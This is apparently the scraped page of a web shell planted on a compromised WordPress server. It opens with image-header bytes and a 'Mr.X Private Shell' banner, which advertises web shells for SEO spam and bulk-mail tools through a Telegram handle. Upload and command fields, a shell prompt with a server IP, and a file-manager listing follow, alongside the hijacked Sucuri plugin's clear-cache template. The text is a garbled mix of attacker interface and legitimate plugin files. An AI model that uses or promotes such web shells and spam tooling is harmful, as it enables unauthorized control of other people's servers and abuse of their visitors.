����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<script type="text/javascript">
/* global jQuery */
/* jshint camelcase: false */
jQuery(document).ready(function ($) {
    $('#firewall-clear-cache-button').on('click', function (event) {
        event.preventDefault();

        var button = $(this);
        button.attr('disabled', true);
        button.html('{{Loading...}}');
        $('#firewall-clear-cache-response').html('');

        $.post('%%SUCURI.AjaxURL.Firewall%%', {
            action: 'sucuriscan_ajax',
            sucuriscan_page_nonce: '%%SUCURI.PageNonce%%',
            form_action: 'firewall_clear_cache',
        }, function (data) {
            button.addClass('sucuriscan-hidden');
            $('#firewall-clear-cache-response').html(data);
        });
    });
    
    $('#firewall-clear-cache-path-button').on('click', function (event) {
        event.preventDefault();

        var button = $(this),
            pathEl = $('input[name="path"]'),
            path = $(pathEl).val();

        if (!path) return;

        button.attr('disabled', true);
        button.html('{{Loading...}}');
        $('#firewall-clear-cache-response').html('');

        $.post('%%SUCURI.AjaxURL.Firewall%%', {
            action: 'sucuriscan_ajax',
            sucuriscan_page_nonce: '%%SUCURI.PageNonce%%',
            form_action: 'firewall_clear_cache',
            path
        }, function (data) {
            $('#firewall-clear-cache-response').html(data);
            button.html('{{Clear Cache}}');
        });
    });

    $('#firewall-clear-cache-auto').on('change', 'input:checkbox', function () {
        var checked = $(this).is(':checked');

        $('#firewall-clear-cache-auto span').html('{{Clear cache when a post or page is updated (Loading...)}}');

        $.post('%%SUCURI.AjaxURL.Firewall%%', {
            action: 'sucuriscan_ajax',
            sucuriscan_page_nonce: '%%SUCURI.PageNonce%%',
            form_action: 'firewall_auto_clear_cache',
            auto_clear_cache: (checked?'enable':'disable'),
        }, function () {
            $('#firewall-clear-cache-auto span').html('{{Clear cache when a post or page is updated}}');
        });
    });
    
    $('#firewall-clear-cache-path-input').on('keyup', function () {
        var input = $(this),
            button = $("#firewall-clear-cache-path-button");

        button.attr('disabled', $(input).val().length === 0);
    });
});
</script>

<div class="sucuriscan-panel">
    <h3 class="sucuriscan-title">{{Clear Cache}}</h3>

    <div class="inside">
        <p>{{The firewall offers multiple options to configure the cache level applied to your website. You can either enable the full cache which is the recommended setting, or you can set the cache level to minimal which will keep the pages static for a couple of minutes, or force the usage of the website headers <em>(only for advanced users)</em>, or in extreme cases where you do not need the cache you can simply disable it. Find more information about it in the <a href="https://kb.sucuri.net/firewall/Performance/caching-options" target="_blank" rel="noopener">Sucuri Knowledge Base</a> website.}}</p>

        <div class="sucuriscan-inline-alert-info">
            <p>{{Note that the firewall has <a href="https://kb.sucuri.net/firewall/Performance/cache-exceptions" target="_blank" rel="noopener">special caching rules</a> for Images, CSS, PDF, TXT, JavaScript, media files and a few more extensions that are stored on our <a href="https://en.wikipedia.org/wiki/Edge_device" target="_blank" rel="noopener">edge</a>. The only way to flush the cache for these files is by clearing the firewall’s cache completely <em>(for the whole website)</em>. Due to our caching of JavaScript and CSS files, often, as is best practice, the use of versioning during development will ensure updates going live as expected. This is done by adding a query string such as <code>?ver=1.2.3</code> and incrementing on each update.}}</p>
        </div>

        <p>{{A web cache (or HTTP cache) is an information technology for the temporary storage (caching) of web documents, such as HTML pages and images, to reduce bandwidth usage, server load, and perceived lag. A web cache system stores copies of documents passing through it; subsequent requests may be satisfied from the cache if certain conditions are met. A web cache system can refer either to an appliance, or to a computer program. &mdash; <a href="https://en.wikipedia.org/wiki/Web_cache" target="_blank" rel="noopener">WikiPedia - Web Cache</a>}}</p>

        <div class="firewall-clear-cache-path">
            <form action="%%SUCURI.URL.Firewall%%" method="post" class="sucuriscan-%%SUCURI.Firewall.APIKeyFormVisibility%%">
                <input type="hidden" name="sucuriscan_page_nonce" value="%%SUCURI.PageNonce%%" />
                <h3 class="lead">Clear Cache by Path</h3>
                <p>This option allows you to clear the cache for an individual page, post, or other path. Enter the URL you wish to clear and then click the Clear Cache button. </p>
                <p>This functionality will not clear static content. (i.e. .jpg or .css)</p>
                <fieldset class="sucuriscan-clearfix">
                    <label>
                        <span class="ml-0">{{Path:}}</span>
                        <input type="text" name="path" id="firewall-clear-cache-path-input" data-cy="firewall-clear-cache-path-input" placeholder="e.g. security/how-to-clear-a-path" class="ml-0" />
                    </label>
                    <button type="submit" class="button button-primary" id="firewall-clear-cache-path-button" disabled data-cy="sucuriscan-clear-cache-path">{{Clear Cache}}</button>
                </fieldset>
            </form>
        </div>
        <div id="firewall-clear-cache-auto" class="mt-2">
            <h3 class="lead">Clear Cache Globally</h3>
            <p>This option allows you to purge all of your page and files cache at once.</p>
            <p>You can select the checkbox below to clear your website cache globally every time a save is made on your WordPress website.</p>
            <label>
                <input type="checkbox" name="sucuriscan_auto_clear_cache" value="true" %%SUCURI.FirewallAutoClearCache%% />
                <span>{{Clear cache whenever a post or page is updated}}</span>
            </label>
        </div>
        <button id="firewall-clear-cache-button" class="button button-primary">{{Clear Global Cache}}</button>

        <div id="firewall-clear-cache-response" class="mt-2"></div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
auditlogs.html.tpl File 5.28 KB 0644
auditlogs.snippet.tpl File 1.68 KB 0644
base.html.tpl File 1.9 KB 0644
dashboard.html.tpl File 3.38 KB 0644
firewall-auditlogs.html.tpl File 3.27 KB 0644
firewall-auditlogs.snippet.tpl File 1.96 KB 0644
firewall-clearcache.html.tpl File 6.39 KB 0644
firewall-ipaccess.html.tpl File 4.29 KB 0644
firewall-settings.html.tpl File 4.04 KB 0644
firewall.html.tpl File 1004 B 0644
index.html File 38 B 0644
integrity-correct.html.tpl File 1.26 KB 0644
integrity-diff-utility.html.tpl File 1.64 KB 0644
integrity-incorrect.html.tpl File 10.1 KB 0644
integrity-incorrect.snippet.tpl File 4.21 KB 0644
integrity-notification.html.tpl File 1.32 KB 0644
integrity.html.tpl File 1.5 KB 0644
lastlogins-admins-lastlogin.snippet.tpl File 207 B 0644
lastlogins-admins.html.tpl File 863 B 0644
lastlogins-admins.snippet.tpl File 878 B 0644
lastlogins-all.html.tpl File 1.88 KB 0644
lastlogins-all.snippet.tpl File 484 B 0644
lastlogins-failedlogins.html.tpl File 2.69 KB 0644
lastlogins-failedlogins.snippet.tpl File 334 B 0644
lastlogins-loggedin.html.tpl File 883 B 0644
lastlogins-loggedin.snippet.tpl File 496 B 0644
lastlogins.html.tpl File 1.04 KB 0644
modalwindow.html.tpl File 533 B 0644
notification-admin.html.tpl File 296 B 0644
notification-pretty.html.tpl File 2.06 KB 0644
notification-simple.html.tpl File 209 B 0644
register-site.html.tpl File 2.72 KB 0644
settings-alerts-bruteforce.html.tpl File 1.32 KB 0644
settings-alerts-events.html.tpl File 1.71 KB 0644
settings-alerts-events.snippet.tpl File 322 B 0644
settings-alerts-ignore-posts.html.tpl File 3.65 KB 0644
settings-alerts-ignore-posts.snippet.tpl File 422 B 0644
settings-alerts-perhour.html.tpl File 1.04 KB 0644
settings-alerts-recipients.html.tpl File 1.98 KB 0644
settings-alerts-recipients.snippet.tpl File 255 B 0644
settings-alerts-subject.html.tpl File 1.43 KB 0644
settings-alerts-subject.snippet.tpl File 220 B 0644
settings-alerts-trustedips.html.tpl File 2.47 KB 0644
settings-alerts-trustedips.snippet.tpl File 410 B 0644
settings-apirecovery.html.tpl File 1.29 KB 0644
settings-apiregistered.html.tpl File 1.06 KB 0644
settings-apiservice-checksums.html.tpl File 1.55 KB 0644
settings-apiservice-proxy.html.tpl File 1.14 KB 0644
settings-apiservice-status.html.tpl File 2.8 KB 0644
settings-general-apikey.html.tpl File 2.56 KB 0644
settings-general-datastorage.html.tpl File 2.07 KB 0644
settings-general-datastorage.snippet.tpl File 3.31 KB 0644
settings-general-importexport.html.tpl File 1.66 KB 0644
settings-general-ipdiscoverer.html.tpl File 2.44 KB 0644
settings-general-resetoptions.html.tpl File 1.2 KB 0644
settings-general-reverseproxy.html.tpl File 1.58 KB 0644
settings-general-selfhosting.html.tpl File 1.8 KB 0644
settings-general-timezone.html.tpl File 1.32 KB 0644
settings-hardening-allowlist-phpfiles.html.tpl File 2.74 KB 0644
settings-hardening-allowlist-phpfiles.snippet.tpl File 383 B 0644
settings-hardening-options.snippet.tpl File 3.21 KB 0644
settings-posthack-available-updates-alert.html.tpl File 685 B 0644
settings-posthack-available-updates.html.tpl File 1.64 KB 0644
settings-posthack-available-updates.snippet.tpl File 554 B 0644
settings-posthack-reset-password-alert.html.tpl File 558 B 0644
settings-posthack-reset-password.html.tpl File 2.78 KB 0644
settings-posthack-reset-password.snippet.tpl File 616 B 0644
settings-posthack-reset-plugins.html.tpl File 3.65 KB 0644
settings-posthack-reset-plugins.snippet.tpl File 852 B 0644
settings-posthack-security-keys.html.tpl File 3.36 KB 0644
settings-posthack-security-keys.snippet.tpl File 237 B 0644
settings-scanner-cronjobs.html.tpl File 3.71 KB 0644
settings-scanner-cronjobs.snippet.tpl File 447 B 0644
settings-scanner-ignore-folders.html.tpl File 2.16 KB 0644
settings-scanner-ignore-folders.snippet.tpl File 316 B 0644
settings-scanner-integrity-cache.html.tpl File 1.84 KB 0644
settings-scanner-integrity-cache.snippet.tpl File 496 B 0644
settings-scanner-integrity-diff-utility.html.tpl File 1.24 KB 0644
settings-webinfo-details.html.tpl File 334 B 0644
settings-webinfo-details.snippet.tpl File 175 B 0644
settings-webinfo-htaccess.html.tpl File 2.05 KB 0644
settings.html.tpl File 3.59 KB 0644
sitecheck-blocklist.html.tpl File 266 B 0644
sitecheck-blocklist.snippet.tpl File 177 B 0644
sitecheck-details.html.tpl File 374 B 0644
sitecheck-details.snippet.tpl File 167 B 0644
sitecheck-malware.html.tpl File 1.21 KB 0644
sitecheck-malware.snippet.tpl File 436 B 0644
sitecheck-recommendations.html.tpl File 277 B 0644
sitecheck-recommendations.snippet.tpl File 245 B 0644
sitecheck-target.html.tpl File 1.63 KB 0644
wordpress-recommendations.html.tpl File 353 B 0644
wordpress-recommendations.snippet.tpl File 179 B 0644